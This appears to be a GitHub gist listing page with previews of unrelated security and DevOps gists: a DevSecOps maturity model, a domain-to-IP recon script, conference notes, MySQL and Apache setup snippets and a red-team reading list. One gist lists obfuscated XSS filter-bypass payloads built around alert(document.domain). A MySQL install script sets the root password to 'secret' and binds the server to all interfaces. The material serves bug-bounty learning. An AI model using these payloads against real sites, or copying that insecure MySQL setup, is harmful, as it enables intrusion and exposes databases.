Gavin Dibley rulin132

@apolloclark
apolloclark / devsecops_maturity_model.md
Last active October 8, 2024 01:35
DevSecOps Maturity Model

DevSecOps Maturity Model

DevSecOps has finally become popular within the wider IT industry in 2019. I started as a web developer in 2001, learned about testing automation, system deployment automation, and "infrastructure as code" in 2012, when DevOps was becoming a popular term. DevOps became common after the release of The Phoenix Project in Jan 2013. It has taken 7+ years for security to become integrated within the DevOps methodology. The following is a list of concepts I go through with project owners, project managers, operations, developers, and security teams, to help establish how mature their DevOps and security automation is, and to help them increase that maturity over time. This model is based on experience consulting with a variety of US Financial, Healthcare, and Department of Defense organizations, and combines:

@xdavidhu
xdavidhu / converter.sh
Last active September 1, 2024 10:56
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
#!/bin/bash
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
  echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
  exit 1
fi
@jhaddix
jhaddix / Testing_Checklist.md
Last active September 22, 2025 03:46 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@tomnomnom
tomnomnom / alert.js
Last active October 25, 2025 05:02
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@elialejandro
elialejandro / AutoinstallMYSQL.sh
Last active July 7, 2020 17:08
MySQL 5.7 No directory, logging in with HOME=/
# Install MySQL
mysql_config_file="/etc/mysql/my.cnf"
echo "mysql-server mysql-server/root_password password secret" | sudo debconf-set-selections
echo "mysql-server mysql-server/root_password_again password secret" | sudo debconf-set-selections
apt-get -y install mysql-client mysql-server
sed -i "s/bind-address\s*=\s*127.0.0.1/bind-address = 0.0.0.0/" ${mysql_config_file}
usermod -d /var/lib/mysql/ mysql
@jahe
jahe / devopscon-2017-notes.md
Last active January 8, 2019 21:01
DevOpsCon 2017 Notes

Glossary

A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. Design is different). The version with a better conversion rate wins.


Monday

09:30 - 17:00 (Salon 4) - Web Hacking: Pentesting and attacking Web Apps

http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf

FindBugs + FindSecurityBugs - Plugins in Eclipse

CVE

CVE-ID - One vulnerability in a CVE registry. It includes a score.

@akirattii
akirattii / docker-mysql-slow-query-log.md
Last active July 14, 2023 22:12
memo: MySQL docker container settings for slow query log

Check running mysql container:

$ sudo docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES
26137efa979f        mysql               "docker-entrypoint..."   8 months ago        Up 10 minutes       0.0.0.0:3306->3306/tcp   container-mysql

Check docker container mysql version:

$ sudo docker exec container-mysql mysqld --version
mysqld  Ver 5.7.15 for Linux on x86_64 (MySQL Community Server (GPL))
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@wataruoguchi
wataruoguchi / How to make your website to maintenance mode.md
Last active January 7, 2024 14:28
How to make your website to maintenance mode - Apache

Apache

How to make your website to maintenance mode

  1. Put maintenance.html into your root directory

  2. Open .htaccess file

  3. Insert this block in the first line of the file

     ErrorDocument 503 /maintenance.html
     <IfModule mod_rewrite.c>
       RewriteEngine On

@pavelrogala
pavelrogala / autoLink.php
Created May 4, 2014 04:28
Regex function for adding link tags in PHP.